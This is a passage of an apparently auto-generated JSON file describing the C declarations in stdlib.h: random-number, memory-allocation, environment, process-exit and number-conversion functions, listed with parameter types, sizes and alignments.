":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "rand", "ns": 0, "location": "/usr/include/stdlib.h:453:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "srand", "ns": 0, "location": "/usr/include/stdlib.h:455:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "rand_r", "ns": 0, "location": "/usr/include/stdlib.h:459:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "drand48", "ns": 0, "location": "/usr/include/stdlib.h:467:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "erand48", "ns": 0, "location": "/usr/include/stdlib.h:468:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lrand48", "ns": 0, "location": "/usr/include/stdlib.h:471:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "nrand48", "ns": 0, "location": "/usr/include/stdlib.h:472:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "mrand48", "ns": 0, "location": "/usr/include/stdlib.h:476:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "jrand48", "ns": 0, "location": "/usr/include/stdlib.h:477:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "srand48", "ns": 0, "location": "/usr/include/stdlib.h:481:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seedval", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "seed48", "ns": 0, "location": "/usr/include/stdlib.h:482:28", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed16v", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } }, { "tag": "function", "name": "lcong48", "ns": 0, "location": "/usr/include/stdlib.h:484:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__param", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 7 } }], "return-type": { "tag": ":void" } }, { "tag": "struct", "ns": 0, "name": "drand48_data", "id": 0, "location": "/usr/include/stdlib.h:490:8", "bit-size": 192, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__x", "bit-offset": 0, "bit-size": 48, "bit-alignment": 16, "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "field", "name": "__old_x", "bit-offset": 48, "bit-size": 48, "bit-alignment": 16, "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "field", "name": "__c", "bit-offset": 96, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "__init", "bit-offset": 112, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "__a", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }] }, { "tag": "function", "name": "drand48_r", "ns": 0, "location": "/usr/include/stdlib.h:501:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "erand48_r", "ns": 0, "location": "/usr/include/stdlib.h:503:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lrand48_r", "ns": 0, "location": "/usr/include/stdlib.h:508:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nrand48_r", "ns": 0, "location": "/usr/include/stdlib.h:511:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mrand48_r", "ns": 0, "location": "/usr/include/stdlib.h:517:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "jrand48_r", "ns": 0, "location": "/usr/include/stdlib.h:520:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__xsubi", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "srand48_r", "ns": 0, "location": "/usr/include/stdlib.h:526:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seedval", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "seed48_r", "ns": 0, "location": "/usr/include/stdlib.h:529:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed16v", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 3 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lcong48_r", "ns": 0, "location": "/usr/include/stdlib.h:532:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__param", "type": { "tag": ":array", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 }, "size": 7 } }, { "tag": "parameter", "name": "__buffer", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "drand48_data", "id": 37 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "malloc", "ns": 0, "location": "/usr/include/stdlib.h:539:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "calloc", "ns": 0, "location": "/usr/include/stdlib.h:541:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nmemb", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "realloc", "ns": 0, "location": "/usr/include/stdlib.h:549:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "reallocarray", "ns": 0, "location": "/usr/include/stdlib.h:558:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__nmemb", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "free", "ns": 0, "location": "/usr/include/stdlib.h:563:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "alloca", "ns": 0, "location": "/usr/include/alloca.h:32:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "valloc", "ns": 0, "location": "/usr/include/stdlib.h:572:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "posix_memalign", "ns": 0, "location": "/usr/include/stdlib.h:577:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__memptr", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } } }, { "tag": "parameter", "name": "__alignment", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "aligned_alloc", "ns": 0, "location": "/usr/include/stdlib.h:583:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__alignment", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "abort", "ns": 0, "location": "/usr/include/stdlib.h:588:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "atexit", "ns": 0, "location": "/usr/include/stdlib.h:592:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__func", "type": { "tag": ":function-pointer" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "at_quick_exit", "ns": 0, "location": "/usr/include/stdlib.h:600:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__func", "type": { "tag": ":function-pointer" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "on_exit", "ns": 0, "location": "/usr/include/stdlib.h:607:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__func", "type": { "tag": ":function-pointer" } }, { "tag": "parameter", "name": "__arg", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "exit", "ns": 0, "location": "/usr/include/stdlib.h:614:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__status", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "quick_exit", "ns": 0, "location": "/usr/include/stdlib.h:620:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__status", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_Exit", "ns": 0, "location": "/usr/include/stdlib.h:626:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__status", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "getenv", "ns": 0, "location": "/usr/include/stdlib.h:631:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "putenv", "ns": 0, "location": "/usr/include/stdlib.h:644:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__string", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setenv", "ns": 0, "location": "/usr/include/stdlib.h:650:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__value", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__replace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "unsetenv", "ns": 0, "location": "/usr/include/stdlib.h:654:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clearenv", "ns": 0, "location": "/usr/include/stdlib.h:661:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mktemp", "ns": 0, "location": "/usr/include/stdlib.h:672:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__template", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "mkstemp", "ns": 0, "location": "/usr/include/stdlib.h:685:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__template", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mkstemps", "ns": 0, "location": "/usr/include/stdlib.h:707:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__template", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__suffixlen", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "mkdtemp", "ns": 0, "location": "/usr/include/stdlib.h:728:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__template", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "system", "ns": 0, "location": "/usr/include/stdlib.h:781:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__command", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "realpath", "ns": 0, "location": "/usr/include/stdlib.h:797:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__resolved", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "typedef", "ns": 0, "name": "__compar_fn_t", "location": "/usr/include/stdlib.h:805:15", "type": { "tag": ":function-pointer" } }, { "tag": "function", "name": "bsearch", "ns": 0, "location": "/usr/include/stdlib.h:817:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__key", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__nmemb", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__compar", "type": { "tag": "__compar_fn_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "qsort", "ns": 0, "location": "/usr/include/stdlib.h:827:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__base", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__nmemb", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__compar", "type": { "tag": "__compar_fn_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "abs", "ns": 0, "location": "/usr/include/stdlib.h:837:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "labs", "ns": 0, "location": "/usr/include/stdlib.h:838:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llabs", "ns": 0, "location": "/usr/include/stdlib.h:841:36", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "div", "ns": 0, "location": "/usr/include/stdlib.h:849:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__numer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__denom", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "div_t" } }, { "tag": "function", "name": "ldiv", "ns": 0, "location": "/usr/include/stdlib.h:851:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__numer", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__denom", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "ldiv_t" } }, { "tag": "function", "name": "lldiv", "ns": 0, "location": "/usr/include/stdlib.h:855:30", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__numer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__denom", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "lldiv_t" } }, { "tag": "function", "name": "ecvt", "ns": 0, "location": "/usr/include/stdlib.h:869:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "fcvt", "ns": 0, "location": "/usr/include/stdlib.h:875:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "gcvt", "ns": 0, "location": "/usr/include/stdlib.h:881:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "qecvt", "ns": 0, "location": "/usr/include/stdlib.h:887:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "qfcvt", "ns": 0, "location": "/usr/include/stdlib.h:890:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "qgcvt", "ns": 0, "location": "/usr/include/stdlib.h:893:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "ecvt_r", "ns": 0, "location": "/usr/include/stdlib.h:899:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fcvt_r", "ns": 0, "location": "/usr/include/stdlib.h:902:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "qecvt_r", "ns": 0, "location": "/usr/include/stdlib.h:906:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__ndigit", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__decpt", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__sign", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__len", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "qfcvt_r", "ns": 0, "location": "/usr/include/stdlib.h:910:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": 